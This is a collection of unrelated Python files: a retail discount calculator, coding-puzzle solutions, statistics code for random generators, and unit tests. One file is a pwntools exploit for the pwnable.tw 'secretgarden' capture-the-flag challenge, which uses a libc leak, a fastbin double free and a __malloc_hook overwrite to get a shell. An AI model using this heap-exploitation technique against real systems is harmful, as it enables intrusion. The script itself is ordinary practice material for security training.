                    card_ID = action[Check.LINE_ACTION_CARD_ID]
                    try:
                        points = action[Check.LINE_ACTION_POINTS]
                    except:
                        points = 0  # older records may lack the points field
                    if card_ID and card_ID.strip():
                        # A card-based discount exists — ensure the card is listed.
                        card_info = чек.cards.get(card_ID)
                        if card_info is None:
                            card_info = {}
                            card_info[Check.CARD_DISCOUNT] = скидка
                            card_info[Check.CARD_POINTS] = points
                            чек.cards[card_ID] = card_info
                        else:
                            DISCOUNT = card_info.get(Check.CARD_DISCOUNT, 0)
                            card_info[Check.CARD_DISCOUNT] = DISCOUNT + скидка
                            POINTS = card_info.get(Check.CARD_POINTS, 0)
                            card_info[Check.CARD_POINTS] = POINTS + points
        # The actual card lookup in the database.
        msg = []
        for card_ID, card_info in чек.cards.items():
            points = card_info.get(Check.CARD_POINTS)
            if points:
                points = round(points, 2)
                card_info[Check.CARD_POINTS] = points
            msg.append(f'карта {card_ID}')
            if points:
                msg.append(f'использованные баллы {points}')
            card = Card.get(engine, card_ID)
            if card is None:
                msg.append('не найдена')
            else:
                card_info[Check.CARD_CARD] = card
                if card.TYPE == 0:
                    # TYPE 0 is the personal card of the check
                    чек.card_id = card_ID
                    msg.append(f'персональная')
        чек.write_log('ПОИСК КАРТ', ", ".join(msg))

    def accept(self, engine, check, LOG=None):
        """Post-sale processing of a sold check (card updates, points, ...)."""
        check.goods = self.goods
        check.params['schema_id'] = self.schema_id
        self.find_used_cards(engine, check)
        # Standard card processing first, then the regular acceptors.
        for acceptor in self.before_accept:
            try:
                acceptor.accept(engine, check)
            except BaseException as ex:
                log.exception(f'{acceptor}')
                check.write_log(f'{acceptor} : {ex}')
        for acceptor in self.acceptors:
            try:
                if acceptor.check_base_conditions(check):
                    acceptor.accept(engine, check)
            except BaseException as ex:
                log.exception(f'{acceptor}')
                check.write_log(f'{acceptor} : {ex}')
class Goods:
    """In-memory goods catalogue of one account, loaded from goods.json.

    The JSON file holds a list of column names and a mapping of product code
    to a row of column values; match() answers whether a product satisfies a
    column -> allowed-values query.
    """

    def __init__(self, account_id):
        self.account_id = account_id
        self.folder = SCHEMES_FOLDER(self.account_id)
        self.GOODS_JSON_FILE = os.path.join(self.folder, 'goods.json')
        self.goods_mtime = None  # mtime of goods.json at the last load
        self.columns = None      # list of column names
        self.rows = None         # product code -> list of column values

    def __str__(self):
        return f'<Goods {self.account_id}>'

    def match(self, code, query):
        """Return True when product *code* satisfies every condition in *query*.

        *query* maps a column id to the collection of accepted values.
        Unknown codes/columns (or any other failure) are logged and count as
        no match — the catalogue answers best-effort.
        """
        try:
            row = self.rows[code]
            for column_id, values in query.items():
                column_no = self.columns.index(column_id)
                if row[column_no] not in values:
                    return False
            return True
        except Exception:
            # BUG FIX: was a bare `except:`, which also swallowed SystemExit/
            # KeyboardInterrupt; the best-effort "no match" answer is kept.
            log.exception(__file__)
            return False

    def update(self, LOG):
        """Reload goods.json when its modification time has changed."""
        if os.path.isfile(self.GOODS_JSON_FILE):
            start = time.perf_counter()
            goods_mtime = os.path.getmtime(self.GOODS_JSON_FILE)
            if self.goods_mtime is None or goods_mtime != self.goods_mtime:
                with open(self.GOODS_JSON_FILE) as f:
                    goods = json.load(f)
                self.columns = goods['columns']
                self.rows = goods['goods']
                LOG(f'ОБНОВЛЕНИЕ СПРАВОЧНИКА ТОВАРОВ {self.account_id} ({self.goods_mtime}, {goods_mtime})', start)
                self.goods_mtime = goods_mtime
class AccountDeptWorker:
    """Binds one account department to its discount scheme and scheme worker."""

    def __init__(self, application, account_id, dept_code, LOG):
        start = time.perf_counter()
        self.application = application
        self.account_id = account_id
        self.dept_code = dept_code
        self.goods = Goods(account_id)
        try:
            LOG(f'{self}')
            SQLITE = Sqlite.Pool().session(account_id, 'discount')
            conn = sqlite3.connect(DISCOUNT_DB(account_id))
            cursor = conn.cursor()
            self.schema = None
            base_schema = None
            # Pick the scheme whose department set contains dept_code;
            # fall back to the base (default) scheme.
            for schema in ДисконтнаяСхема.findall(cursor):
                if schema.это_основная_схема:
                    base_schema = schema
                else:
                    sql = f'select info from dept_set_item where dept_set=?'
                    params = [schema.набор_подразделений_ID]
                    cursor.execute(sql, params)
                    for INFO, in cursor:
                        info = json.loads(INFO)
                        code = info['code']
                        if code == dept_code:
                            self.schema = schema
                            break
                    if self.schema is not None:
                        break
            if self.schema is None:
                self.schema = base_schema
            # --------------------------------
            self.goods.update(LOG)
            self.worker = AccountSchemeWorker(self.application, self.schema.ID, self.goods, path=DISCOUNT_DB(account_id), bigsize=0)
            self.worker.open(LOG)
            LOG(f'{self} : {self.schema}', start)
        except Exception as ex:
            LOG(f'{self} : {ex}')
            log.exception(__file__)
            # NOTE(review): on failure self.worker stays unset, yet calc()/accept()
            # test `self.worker is None` — an early failure would raise
            # AttributeError there instead. Confirm intended.
        finally:
            # NOTE(review): if the exception occurred before SQLITE/conn were
            # assigned, these lines raise NameError. Confirm.
            SQLITE.close()
            conn.close()

    def close(self):
        """Release the scheme worker's resources."""
        self.worker.close()

    def calc(self, check, LOG, POSTGRES):
        """Calculate discounts for *check*; return the resulting XML string."""
        if self.worker is None:
            check.write_log(f'ПОЛУЧЕНИЕ РАСЧЕТНЫХ АКЦИЙ', f'НЕТ НИ ОДНОЙ АКЦИИ')
        else:
            pg_connection = Postgres.connect(self.account_id)
            with pg_connection:
                engine = Engine(None, pg_connection)
                check.write_log(f'ОТКРЫТИЕ СОЕДИНЕНИЯ С БД')
                self.worker.calc(engine, check, LOG)
                engine.close()
        # Serialize the (possibly discounted) check back to XML.
        xml = check.xml()
        xml = '<?xml version="1.0" encoding="UTF-8"?>\n' + xml.decode("utf-8")
        check.save_xml_file(xml, 'calc.r.xml')
        return xml

    def get_keywords(self, keywords, check, LOG, POSTGRES):
        """Collect keyword data for *check* via the scheme worker."""
        self.worker.get_keywords(keywords, check, LOG)

    def accept(self, check, LOG, POSTGRES):
        """Post-sale processing of a sold check via the scheme worker."""
        if self.worker is None:
            check.write_log(f'НЕТ НИ ОДНОЙ АКЦИИ')
        else:
            pg_connection = Postgres.connect(self.account_id)
            with pg_connection:
                engine = Engine(None, pg_connection)
                check.write_log(f'ОТКРЫТИЕ СОЕДИНЕНИЯ С БД')
                self.worker.accept(engine, check, LOG)
                check.create(engine)
                engine.close()
                check.write_log(f'ЗАКРЫТИЕ СОЕДИНЕНИЯ С БД')

    def get_prices(self, dept_code, date, LOG, POSTGRES):
        """Collect promo prices of the department for price tags/labels."""
        prices = {}
        self.worker.get_prices(prices, dept_code, date, LOG)
        return prices

    def __str__(self):
        return f'<AccountDeptWorker {self.account_id} {self.dept_code}>'

    def __repr__(self):
        return self.__str__()
class AccountWorker:
    """Per-account coordinator: keeps one scheme worker per discount scheme
    and routes each department code to its scheme.

    Rebuilds everything when the schemes VERSION file changes; holds a
    postgres connection pool shared by calc()/accept().
    """

    def __init__(self, application, account_id):
        self.application = application
        self.account_id = account_id
        self.goods = Goods(account_id)
        self.folder = SCHEMES_FOLDER(self.account_id)
        self.worker_of_scheme = {}  # schema_id -> AccountSchemeWorker
        self.scheme_of_dept = {}    # department code -> schema_id
        self.VERSION = ''           # last seen content of the VERSION file
        self.VERSION_FILE = os.path.join(self.folder, 'VERSION')
        # Pool of 1..10 postgres connections shared by calc()/accept().
        self.connection_pool = Postgres.create_connection_pool(account_id, 1, 10)
        log.info(f'СОЗДАНИЕ ПУЛА СОЕДИНЕНИЙ 1 10')

    def close(self):
        """Close every scheme worker and forget the scheme/department maps."""
        for worker in self.worker_of_scheme.values():
            worker.close()
        self.worker_of_scheme = {}
        self.scheme_of_dept = {}

    def update(self, LOG):
        """Reload goods and, when the VERSION file changed, rebuild all workers.

        Serialized by the module-level UpdateLock.
        """
        with UpdateLock:
            self.goods.update(LOG)
            with open(self.VERSION_FILE) as f:
                VERSION = f.read()
            if self.VERSION != VERSION:
                start = time.perf_counter()
                LOG(f'{self} ({self.VERSION}, {VERSION})')
                self.VERSION = VERSION
                #----------------------------------
                self.close()
                #-----------------------------------------
                # Collect the discount schemes and their departments: each
                # numeric file in the schemes folder is one scheme database.
                #-----------------------------------------
                for schema_id in os.listdir(self.folder):
                    if schema_id.isdigit():
                        schema_id = int(schema_id)
                        path = os.path.join(self.folder, str(schema_id))
                        ENGINE = create_engine(f'sqlite:///{path}')
                        Session = sessionmaker(bind=ENGINE)
                        SQLITE = Session()
                        try:
                            # Migration for old versions: add the `bigsize`
                            # column to `schema` when it is missing.
                            bigsize_exists = False
                            cur = SQLITE.execute(f'pragma table_info(schema)').fetchall()
                            for column in cur:
                                if column[1] == 'bigsize':
                                    bigsize_exists = True
                                    break
                            if not bigsize_exists:
                                sql = 'alter table schema add column bigsize integer'
                                log.debug(sql)
                                SQLITE.execute(sql)
                                SQLITE.commit()
                            # -----------------------------
                            schema = SQLITE.query(Schema).get(schema_id)
                            codes = []
                            if schema_id == 0:
                                # Scheme 0 is the default scheme (no department list).
                                worker = AccountSchemeWorker(self.application, schema_id, self.goods, path=path, bigsize = schema.bigsize)
                                self.worker_of_scheme[schema_id] = worker
                            else:
                                worker = AccountSchemeWorker(self.application, schema_id, self.goods, path=path, bigsize = schema.bigsize)
                                self.worker_of_scheme[schema_id] = worker
                                codes = schema.get_dept_codes(SQLITE)
                            for code in codes:
                                self.scheme_of_dept[code] = schema_id
                            LOG(f'{path} {schema.наименование} {codes}')
                        except Exception as ex:
                            log.exception(__file__)
                            LOG.error(ex)
                        finally:
                            SQLITE.close()
                LOG(f'Распределение дисконтных схем'.upper(), start)
                LOG(f'{self.worker_of_scheme}')
                LOG(f'{self.scheme_of_dept}')

    def get_worker(self, dept_code, LOG):
        """Return the (opened) scheme worker serving *dept_code* (scheme 0 by default)."""
        self.update(LOG)
        schema_id = self.scheme_of_dept.get(dept_code, 0)
        worker = self.worker_of_scheme.get(schema_id)
        worker.open(LOG)
        return worker

    def calc(self, check, LOG, POSTGRES):
        """Calculate discounts for *check*; return the resulting XML string."""
        калькулятор = self.get_worker(check.dept_code, LOG)
        check.params[Check.VERSION] = self.VERSION
        if калькулятор is None:
            check.write_log(f'ПОЛУЧЕНИЕ РАСЧЕТНЫХ АКЦИЙ', f'НЕТ НИ ОДНОЙ АКЦИИ')
        else:
            check.write_log(f'ПОЛУЧЕНИЕ РАСЧЕТНЫХ АКЦИЙ')
            pg_connection = None
            try:
                # Take a pooled connection; always return it, even on error.
                pg_connection = self.connection_pool.getconn()
                with pg_connection:
                    engine = Engine(None, pg_connection)
                    check.write_log(f'ОТКРЫТИЕ СОЕДИНЕНИЯ С БД')
                    калькулятор.calc(engine, check, LOG)
                    engine.close()
                self.connection_pool.putconn(pg_connection)
                check.write_log(f'ЗАКРЫТИЕ СОЕДИНЕНИЯ С БД')
            except BaseException as ex:
                log.exception(f'{self}.calc')
                if pg_connection:
                    self.connection_pool.putconn(pg_connection)
                raise Exception(f'{ex}')
        # Serialize the (possibly discounted) check back to XML.
        xml = check.xml()
        xml = '<?xml version="1.0" encoding="UTF-8"?>\n' + xml.decode("utf-8")
        check.save_xml_file(xml, 'calc.r.xml')
        return xml

    def get_keywords(self, keywords, check, LOG, POSTGRES):
        """Collect keyword data for *check* via its department's worker."""
        worker = self.get_worker(check.dept_code, LOG)
        check.params[Check.VERSION] = self.VERSION
        worker.get_keywords(keywords, check, LOG)

    def accept(self, check, LOG, POSTGRES):
        """Post-sale processing of a sold check via its department's worker."""
        калькулятор = self.get_worker(check.dept_code, LOG)
        check.params[Check.VERSION] = self.VERSION
        if калькулятор is None:
            check.write_log(f'ПОЛУЧЕНИЕ ПОСЛЕПРОДАЖНЫХ АКЦИЙ', 'НЕТ НИ ОДНОЙ АКЦИИ')
        else:
            check.write_log(f'ПОЛУЧЕНИЕ ПОСЛЕПРОДАЖНЫХ АКЦИЙ')
            pg_connection = None
            try:
                # Take a pooled connection; always return it, even on error.
                pg_connection = self.connection_pool.getconn()
                with pg_connection:
                    engine = Engine(None, pg_connection)
                    check.write_log(f'ОТКРЫТИЕ СОЕДИНЕНИЯ С БД')
                    калькулятор.accept(engine, check, LOG)
                    check.create(engine)
                    engine.close()
                self.connection_pool.putconn(pg_connection)
                check.write_log(f'ЗАКРЫТИЕ СОЕДИНЕНИЯ С БД')
            except BaseException as ex:
                log.exception(f'{self}.calc')
                if pg_connection:
                    self.connection_pool.putconn(pg_connection)
                raise Exception(f'{ex}')

    def get_prices(self, dept_code, date, LOG, POSTGRES):
        """Collect promo prices of a department for price tags/labels."""
        prices = {}
        worker = self.get_worker(dept_code, LOG)
        worker.get_prices(prices, dept_code, date, LOG)
        return prices

    def __str__(self):
        return f'<AccountWorker {self.account_id}>'

    def __repr__(self):
        return self.__str__()
class Calculator:
    """Entry-point facade: routes checks to a per-account AccountWorker, created lazily."""

    def __init__(self, application):
        self.application = application
        self.workers = {}  # account_id -> AccountWorker

    def account_worker(self, account_id, LOG):
        """Return the worker for *account_id*, creating and caching it on first use."""
        try:
            return self.workers[account_id]
        except KeyError:
            worker = AccountWorker(self.application, account_id)
            self.workers[account_id] = worker
            return worker

    def calc(self, check, LOG, POSTGRES):
        """Calculate discounts for a check; returns its XML representation."""
        return self.account_worker(check.account_id, LOG).calc(check, LOG, POSTGRES)

    def get_keywords(self, keywords, check, LOG, POSTGRES):
        """Collect keyword data for a check."""
        self.account_worker(check.account_id, LOG).get_keywords(keywords, check, LOG)

    def accept(self, check, LOG, POSTGRES):
        """Run post-sale processing for a sold check."""
        self.account_worker(check.account_id, LOG).accept(check, LOG, POSTGRES)

    def get_prices(self, account_id, dept_code, date, LOG, POSTGRES):
        """Evaluate promo prices for one department's price tags."""
        return self.account_worker(account_id, LOG).get_prices(dept_code, date, LOG)

    def __str__(self):
        return 'Calculator()'
|
"""
16. 最接近的三数之和
给定一个包括 n 个整数的数组 nums 和 一个目标值 target。找出 nums 中的三个整数,使得它们的和与 target 最接近。
返回这三个数的和。假定每组输入只存在唯一答案。
例如,给定数组 nums = [-1,2,1,-4], 和 target = 1.
与 target 最接近的三个数的和为 2. (-1 + 2 + 1 = 2).
"""
class Solution:
    def threeSumClosest(self, nums, target):
        """
        :type nums: List[int]
        :type target: int
        :rtype: int
        """
        # Like 3Sum: sort, fix an anchor element, then move two pointers in
        # from both ends. Unlike 3Sum we track the sum with the smallest
        # |sum - target| seen so far, returning early on an exact hit.
        nums.sort()
        size = len(nums)
        best = nums[0] + nums[1] + nums[size - 1]
        for anchor in range(size - 2):
            lo, hi = anchor + 1, size - 1
            while lo < hi:
                current = nums[anchor] + nums[lo] + nums[hi]
                if current == target:
                    return current
                if abs(current - target) < abs(target - best):
                    best = current
                if current < target:
                    lo += 1
                else:
                    hi -= 1
        return best


if __name__ == '__main__':
    s = Solution()
    s.threeSumClosest([-1, 2, 1, -4], 1)
from pwn import *
def cmd(c):
    # Select an entry in the target binary's main menu.
    p.sendlineafter("choice : ",str(c))

def add(name="XXXX",l=0x80,c="AAAA"):
    # Menu 1: allocate a flower with name-buffer size `l`, name `name`, colour `c`.
    cmd(1)
    p.sendlineafter("name :",str(l))
    p.sendafter("flower :",name)
    p.sendlineafter("flower :",c)

def show():
    # Menu 2: print every flower (used here to leak heap contents).
    cmd(2)

def free(idx):
    # Menu 3: remove flower `idx`.
    cmd(3)
    p.sendlineafter("garden:",str(idx))

def clear():
    # Menu 4: clean the garden.
    cmd(4)

# NOTE(review): Python-2-era pwntools script ('\x00' as str, str/bytes mixing) —
# run it under Python 2.
#p=process("secretgarden",env={"LD_PRELOAD":"./libc_64.so.6"})
p=remote("chall.pwnable.tw",10203)
context.arch='amd64'
# Stage 1 — leak: allocate two flowers, free+clear one, then reallocate so
# show() prints residual heap data from which a libc address is recovered.
add()#0
add()#1
free(0)
clear()
add("A")
show()
p.readuntil("Name of the flower[0] :")
# Convert the leaked qword to the libc base; the subtracted constant is an
# empirically-derived offset from the leaked pointer to the mapping base.
base=u64(p.readline()[:-1].ljust(8,'\x00'))-(0x7ffff7dd1b41-0x7ffff7a0d000)+0x1000
libc=ELF("./libc_64.so.6")
libc.address=base
log.warning(hex(base))
# Stage 2 — double free on 0x70-sized chunks: free(2), free(3), free(2)
# corrupts the fastbin list, letting us allocate a fake chunk near
# __malloc_hook (the -35 offset lands on a usable size field).
add("nier",0x68)#2
add("nier",0x68)#3
add()
free(2)
free(3)
free(2)
clear()
add(p64(libc.symbols['__malloc_hook']-35),0x68)#2
add("\n",0x68)#3
add("\n",0x68)#2
# Overwrite __malloc_hook with a one-gadget (libc offset 0xef6c4).
add("\x00"*19+p64(0xef6c4+base),0x68)#2
# Trigger malloc (abort path also mallocs) so the hooked gadget runs.
free(2)
free(2)
#gdb.attach(p)
p.interactive()
|
import random

from abc import ABC
from abc import abstractmethod
from bisect import bisect_right
from itertools import repeat
from math import sqrt
from math import log10
# NOTE: this rebinds the name `random` from the module to the function
# random.random — after this line `random.randint` would fail; use the
# explicitly imported `randint` below instead.
from random import random
from random import randint
from typing import List

import matplotlib.pyplot as plot
from scipy.special import erfinv
class RandomGenerator(ABC):
    """Abstract base for pseudo-random generators seeded with an 8-digit integer."""

    _NUM_LENGTH = 8          # digits kept when rounding generated values
    _LEFT_BOUND = 10000000   # smallest valid 8-digit seed
    _RIGHT_BOUND = 99999999  # largest valid 8-digit seed

    def __init__(self, *, seed: int = None):
        """Store *seed*, or draw a random 8-digit one when omitted.

        Raises:
            ValueError: if an explicit seed lies outside [10000000; 99999999].
        """
        if seed is None:
            # BUG FIX: this used `random.randint`, but the file-level
            # `from random import random` rebinds `random` to the function,
            # so that attribute access raised AttributeError at runtime.
            self.seed = randint(self._LEFT_BOUND, self._RIGHT_BOUND)
        elif not self._LEFT_BOUND <= seed <= self._RIGHT_BOUND:
            raise ValueError(f"Seed must be in [{self._LEFT_BOUND};{self._RIGHT_BOUND}].")
        else:
            self.seed = seed

    @abstractmethod
    def once(self) -> float:
        """Return the next pseudo-random float in [0, 1)."""

    @abstractmethod
    def generate(self, *, amount: int) -> List[float]:
        """Return a list of *amount* pseudo-random floats in [0, 1)."""
class MultiplicativeCongruentRandomGenerator(RandomGenerator):
    """Multiplicative congruential generator: seed_{n+1} = k * seed_n mod m."""

    def __init__(self, *, seed: int = None, m: int, k: int):
        super().__init__(seed=seed)
        self.m = m  # modulus
        self.k = k  # multiplier

    def once(self) -> float:
        """Advance the state once; return seed/m rounded to 8 digits."""
        self.seed = self.k * self.seed % self.m
        return round(self.seed / self.m, self._NUM_LENGTH)

    def generate(self, *, amount: int) -> List[float]:
        """Return *amount* consecutive values of the sequence."""
        return [self.once() for _ in range(amount)]
def expectation(seq):
    """Sample mean of *seq* (PEP 8 E731: def instead of an assigned lambda)."""
    return sum(seq) / len(seq)


def dispersion(seq, exp):
    """Biased (population) variance of *seq*, given its precomputed mean *exp*.

    Computed as mean(e² − exp²) = E[X²] − E[X]².
    """
    return sum([e ** 2 - exp ** 2 for e in seq]) / len(seq)
def find_correlation(seq_x, seq_y):
    """Sample correlation: (E[XY] − E[X]E[Y]) / sqrt(D[X] D[Y]).

    The sequences are expected to have equal length.
    """
    products = [a * b for (a, b) in zip(seq_x, seq_y)]
    mean_x = sum(seq_x) / len(seq_x)
    mean_y = sum(seq_y) / len(seq_y)
    mean_xy = sum(products) / len(products)
    # Population variances via E[X²] − E[X]² (the module's dispersion formula).
    var_x = sum([e ** 2 - mean_x ** 2 for e in seq_x]) / len(seq_x)
    var_y = sum([e ** 2 - mean_y ** 2 for e in seq_y]) / len(seq_y)
    return (mean_xy - mean_x * mean_y) / sqrt(var_x * var_y)
def create_histogram(*, seq):
    """Draw an equal-width relative-frequency histogram of *seq* over [0, 1).

    Bin count: sqrt(n)+1 for small samples (n <= 100), 3*log10(n) otherwise.
    Returns the plot module so the caller can show or save the figure.
    """
    size = len(seq)
    sections = int(sqrt(size) + 1 if size <= 100 else 3 * log10(size))
    delta = 1 / sections
    left = 0
    for _ in range(sections):
        right = left + delta
        hits = sum([1 if left <= e < right else 0 for e in seq])
        plot.bar(left, hits / size, width=delta, align="edge")
        left = right
    return plot
def m_confidence_interval(*, seq, alpha=0.95) -> (float, float):
    """Confidence interval for the sample mean at level *alpha*."""
    size = len(seq)
    mean = expectation(seq)
    std = sqrt(dispersion(seq, mean))
    quantile = erfinv(alpha / 2)
    margin = std * quantile / sqrt(size)
    return mean - margin, mean + margin
def d_confidence_interval(*, seq, alpha=0.95) -> (float, float):
    """Confidence interval for the sample variance at level *alpha*."""
    size = len(seq)
    mean = expectation(seq)
    var = dispersion(seq, mean)
    quantile = erfinv(alpha / 2)
    margin = quantile * sqrt(2 / (size - 1)) * var
    return var - margin, var + margin
class CRNGenerator:
    """Acceptance-rejection sampler for the joint density
    f(x, y) = 2*(x^2 + y/3) on the unit square."""
    # Supremum of the marginal density fx on [0, 1]; used in the rejection test.
    x_supremum = 2 + 1 / 3
    # Supremum of the marginal density fy on [0, 1].
    y_supremum = 4 / 3
    # NOTE(review): a zero supremum makes the y rejection test accept every
    # candidate (rand_z * 0 < positive density) — confirm this is intended.
    xy_y_supremum = 0
    def __init__(self, *, generator: "RandomGenerator"):
        self.generator = generator
        # FIX: x_selection/y_selection used to be shared *class-level* mutable
        # lists, so every instance mutated the same objects; they are now
        # created per instance (instance access is unchanged for callers).
        self.x_selection = []
        self.y_selection = []
    def fxy(self, *, x: float, y: float) -> float:
        """Joint density f(x, y)."""
        return 2 * (x ** 2 + y / 3)
    def fx(self, x: float) -> float:
        """Marginal density of x."""
        return 2 * x ** 2 + 1 / 3
    def fy(self, y: float) -> float:
        """Marginal density of y."""
        return (2 + 2 * y) / 3
    def generate(self, *, amount: int) -> (List[float], List[float]):
        """Draw *amount* (x, y) pairs; returns the two selection lists."""
        self.x_selection.clear()
        self.y_selection.clear()
        # Rejection-sample x from its marginal density.
        while len(self.x_selection) != amount:
            rand_x, rand_z = self.generator.generate(amount=2)
            if rand_z * self.x_supremum < self.fx(rand_x):
                self.x_selection.append(rand_x)
        # Sample each y from the conditional density f(x, y) / fx(x).
        while len(self.y_selection) != amount:
            rand_y, rand_z = self.generator.generate(amount=2)
            cur_x = self.x_selection[len(self.y_selection)]
            if rand_z * self.xy_y_supremum < self.fxy(x=cur_x, y=rand_y) / self.fx(cur_x):
                self.y_selection.append(rand_y)
        return self.x_selection, self.y_selection
class DRNGenerator:
    """Discrete 2-D generator built from the CDF F(x, y) on an amount x amount grid."""
    # NOTE(review): these are shared *class-level* mutable lists — every
    # instance mutates the same objects; they likely belong in __init__.
    intervals = []
    distribution = []
    x_selection = []
    y_selection = []
    def F(self, *, x: float, y: float) -> float:
        """Joint CDF F(x, y) = x*y*(2x^2 + y) / 3."""
        return (x * y * (2 * x ** 2 + y)) / 3
    def _F(self, *, x: float, y: float) -> float:
        """Probability mass of the grid cell with top-right corner (x, y)
        (2-D inclusion-exclusion over one step in each direction)."""
        return self.F(x=x, y=y) \
            - self.F(x=x - self.step, y=y) \
            - self.F(x=x, y=y - self.step) \
            + self.F(x=x - self.step, y=y - self.step)
    def __init__(self, *, amount: int, generator: RandomGenerator):
        # Precompute the interval grid and cell-probability tables once.
        self.amount = amount
        self.generator = generator
        self._get_intervals()
        self._get_distribution()
    def generate(self):
        """Fill x_selection/y_selection with *amount* samples mapped back to grid midpoints."""
        while len(self.x_selection) < self.amount:
            rand_x = self.generator.once()
            rand_y = random()
            p = self._F(x=rand_x, y=rand_y)
            x, y = self._find_p(p)
            self.x_selection.append(1 / self.amount * (x + 1))
            self.y_selection.append(1 / self.amount * (y + 1))
    def _find_p(self, p) -> (float, float):
        """Map probability *p* to the grid indices of the nearest larger cell mass."""
        # NOTE(review): bisect_right can return len(sorted_p) when p exceeds
        # every stored value, which would raise IndexError here — confirm the
        # input range makes that impossible.
        pos = bisect_right(self.sorted_p, p)
        return self.p_indexes[self.sorted_p[pos]]
    def _get_intervals(self):
        """Build the right edges of `amount` equal-width intervals over (0, 1]."""
        self.intervals.clear()
        self.step = 1 / self.amount
        right = self.step
        while len(self.intervals) != self.amount:
            self.intervals.append(right)
            right += self.step
    def _get_distribution(self):
        """Tabulate per-cell masses plus a sorted list / index map for lookup."""
        self.distribution.clear()
        self.p_indexes = {}
        self.sorted_p = []
        for i in range(0, self.amount):
            self.distribution.append([])
            for j in range(0, self.amount):
                _x = self.intervals[i]
                _y = self.intervals[j]
                cur = self._F(x=_x, y=_y)
                # NOTE(review): duplicate cell masses overwrite earlier (i, j)
                # pairs in p_indexes — verify masses are unique on this grid.
                self.p_indexes[cur] = (i, j)
                self.sorted_p.append(cur)
                self.distribution[-1].append(cur)
        self.sorted_p.sort()
def analise_crn():
    """Sample the continuous generator, plot histograms and print CIs."""
    gen = MultiplicativeCongruentRandomGenerator(seed=60000607, m=87178291199, k=479001599)
    crn = CRNGenerator(generator=gen)
    crn.generate(amount=10000)
    for selection in (crn.x_selection, crn.y_selection):
        create_histogram(seq=selection).show()
    intervals = {
        "mx": m_confidence_interval(seq=crn.x_selection),
        "my": m_confidence_interval(seq=crn.y_selection),
        "dx": d_confidence_interval(seq=crn.x_selection),
        "dy": d_confidence_interval(seq=crn.y_selection),
    }
    for label, (lo, hi) in intervals.items():
        print(f"{lo} < {label} < {hi}")
def analise_drn():
    """Sample the discrete generator, plot histograms and print CIs."""
    gen = MultiplicativeCongruentRandomGenerator(seed=60000607, m=87178291199, k=479001599)
    drn = DRNGenerator(amount=100, generator=gen)
    drn.generate()
    for selection in (drn.x_selection, drn.y_selection):
        create_histogram(seq=selection).show()
    intervals = {
        "mx": m_confidence_interval(seq=drn.x_selection),
        "my": m_confidence_interval(seq=drn.y_selection),
        "dx": d_confidence_interval(seq=drn.x_selection),
        "dy": d_confidence_interval(seq=drn.y_selection),
    }
    for label, (lo, hi) in intervals.items():
        print(f"{lo} < {label} < {hi}")
if __name__ == "__main__":
    # analise_crn()
    analise_drn()
|
from typing import List
from collections import defaultdict, deque
class Solution:
    def orangesRotting(self, grid: List[List[int]]) -> int:
        """Multi-source BFS: minutes until no fresh orange remains, -1 if impossible."""
        rows, cols = len(grid), len(grid[0])
        fresh = set()
        queue = deque()  # entries are ((row, col), minute)
        for r in range(rows):
            for c in range(cols):
                if grid[r][c] == 1:
                    fresh.add((r, c))
                elif grid[r][c] == 2:
                    queue.append(((r, c), 0))
        minute = 0
        while queue:
            (r, c), minute = queue.popleft()
            for neighbour in ((r + 1, c), (r - 1, c), (r, c + 1), (r, c - 1)):
                if neighbour in fresh:
                    fresh.remove(neighbour)
                    queue.append((neighbour, minute + 1))
        # Any fresh orange left is unreachable from every rotten one.
        return -1 if fresh else minute
# Runtime: 60 ms, faster than 32.73% of Python3 online submissions for Rotting Oranges.
# Memory Usage: 13.9 MB, less than 52.18% of Python3 online submissions for Rotting Oranges.
|
# -*- coding: utf-8 -*-
"""
Unit Tests for low level training data ingestion.
Usage:
python -m unittest tests/test_ingest.py
"""
import sys
import unittest
import pandas as pd
sys.path.append('src')
sys.path.append("src/Mask_RCNN")
from config import GlobalConfig
import ingest
class IngestTest(unittest.TestCase):
    """Tests for the low-level training-data ingestion helpers."""
    @unittest.skip('Test depends on S3 access permissions.')
    def test_get_s3_dcm(self):
        """Fetching a DICOM from S3 yields a 1024x1024 pixel array."""
        bucket = GlobalConfig.get('S3_BUCKET_NAME')
        imgdir = GlobalConfig.get('S3_STAGE1_TRAIN_IMAGE_DIR')
        test_dcm_path = imgdir + '/0004cfab-14fd-4e49-80ba-63a80b6bddd6.dcm'
        ds = ingest.get_s3_dcm(bucket=bucket, file_key=test_dcm_path)
        self.assertEqual(ds.pixel_array.shape, (1024, 1024))
    def test_parse_training_labels(self):
        """Parsed labels map patient id -> dicom path, binary label and boxes."""
        parsed = ingest.parse_training_labels(
            train_box_df=pd.read_csv(GlobalConfig.get('EXAMPLE_TRAIN_BOX_PATH')),
            train_image_dirpath=GlobalConfig.get('EXAMPLE_STAGE1_TRAIN_IMAGE_DIR'))
        # FIX: assertEquals is a long-deprecated alias of assertEqual.
        # Negative Case
        self.assertEqual(
            parsed['0004cfab-14fd-4e49-80ba-63a80b6bddd6'],
            {'dicom': 'data/example/stage_1_train_images/0004cfab-14fd-4e49-80ba-63a80b6bddd6.dcm',
             'label': 0,
             'boxes': []})
        # Positive Case
        self.assertEqual(
            parsed['00436515-870c-4b36-a041-de91049b9ab4'],
            {'dicom': 'data/example/stage_1_train_images/00436515-870c-4b36-a041-de91049b9ab4.dcm',
             'label': 1,
             'boxes': [[264.0, 152.0, 213.0, 379.0], [562.0, 152.0, 256.0, 453.0]]})
if __name__ == '__main__':
    unittest.main()
|
"""
1st approach
- sort the array
- create an array of meeting rooms
- each interval, compare the last meeting(since sorted) amongst the meeting in the meeting rooms
- if there is no collision, put the meeting in that room, else create a new meeting room for the interval
Time O(nlogn) sort
Space O(n) result array
84 ms, faster than 16.12%
"""
class Solution(object):
    def minMeetingRooms(self, intervals):
        """Greedy room assignment: each meeting reuses the first free room.

        :type intervals: List[List[int]]
        :rtype: int
        """
        if not intervals:
            return 0
        # FIX: `sorted(..., cmp=...)` is Python-2-only; the equivalent key
        # sort orders by start time, breaking ties on end time.
        intervals = sorted(intervals, key=lambda iv: (iv[0], iv[1]))
        # rooms[j] holds the meeting currently occupying room j.
        rooms = [intervals[0]]
        for cur in intervals[1:]:
            for j, room in enumerate(rooms):
                if room[1] <= cur[0]:
                    # Room j frees up before this meeting starts — reuse it.
                    rooms[j] = cur
                    break
            else:
                rooms.append(cur)
        return len(rooms)
"""
2nd approach
- sort the array
- create an array of last hour of occupied rooms
- each interval, compare the last meeting(since sorted) amongst the meeting in the meeting rooms
- if there is no collision, put the meeting in that room, else create a new meeting room for the interval
Time O(nlogn) sort
Space O(n) result array
84 ms, faster than 18.80%
"""
class Solution(object):
